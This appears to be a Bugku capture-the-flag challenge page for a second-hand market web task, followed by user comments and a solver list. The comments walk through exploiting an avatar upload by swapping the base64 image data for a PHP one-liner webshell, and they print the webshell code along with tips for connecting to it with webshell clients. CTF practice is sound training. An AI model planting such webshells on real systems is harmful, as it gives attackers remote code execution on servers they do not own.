xxx二手交易市场WEB 未解决

分数: 30 金币: 5
题目作者: Aman
一  血: dotast
一血奖励: 5金币
解  决: 2250
提  示:
描  述:
本人现实碰到的题目,无提示勿问
评论
study123 3年前

注意有些评论的字符被bugku过滤替换掉了

回复 0

study123 3年前

用蚂剑连上后,我又试了很多次,好像是有些参数名(也就是所谓的密码)是不行的,测了‘cmd’死活不行,后面的>会不见,测试发现这个‘’<?php @eval($_POST['user']); ?>‘’可以,还有?前面是有一个空格的

回复 0

study123 3年前

头像上传那里,抓包,data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2F后面的数据全删了,然后在自己加上编码过的一句话木马。jpeg要改成php

回复 5

kjdfklha 3年前

很经典的文件上传题目,点赞

回复 0

helloxy 3年前

头像上传,然后抓包修改,base64编码方式

回复 0

BATQQ 3年前

好题目

回复 0

onerm 3年前

后台上传图片存在任意文件上传漏洞,更改base64加密后的图片后缀名和内容(base64加密的一句话把结尾?>去掉,否则在后台base64解密>为空又有?会发生语句错误),再用蚁剑连

回复 4

pil10w 3年前

按照各种wp的方法试了好几次,但是都没有成功,用蚁剑不行,手动也不行,T^T,文件也显示上传成功了,为什么啊?

回复 2
kiki677 3年前

你是不是有报错,它好像会自动将php标签闭合的?>中的">"去掉,我蚁剑连接后发现php文件里只有个最后只有个?了,你直接不闭合就可以了,用这个<?php @eval($_POST['pass']);

回复 0

mantou 3年前

冰蝎死活连不上

回复 0
Restwlaq 1年前

这头像好熟悉

回复 0

EndlessShw 3年前

什么玩意,木马上传成功后不能连接,能够正常访问到但一直是连接为空

回复 0
Eas0n 3年前

师傅麻烦排查一下,是否出现了一句话木马构造错误的情况

回复 0

WriteUp

image
nic016

5 金币

评分(9)

解题动态

xiaoxiaojiangshi 攻破了该题 3小时前
小杰罗666 攻破了该题 2天前
FMGT 攻破了该题 4天前
fuchen11 攻破了该题 4天前
15922111842 攻破了该题 5天前
breeze153 攻破了该题 5天前
mps11 攻破了该题 6天前
VFlame 攻破了该题 7天前
攻破了该题 8天前
AIRForce 攻破了该题 8天前
1034214465 攻破了该题 8天前
yhyyhy 攻破了该题 9天前
2470843177 攻破了该题 9天前
李师傅 攻破了该题 10天前
燃燃然燃 攻破了该题 10天前
dooi 攻破了该题 10天前
Ktcc5 攻破了该题 12天前
18244339938 攻破了该题 12天前
mushmush 攻破了该题 12天前
积极又努力的小冀同学 攻破了该题 12天前
问题反馈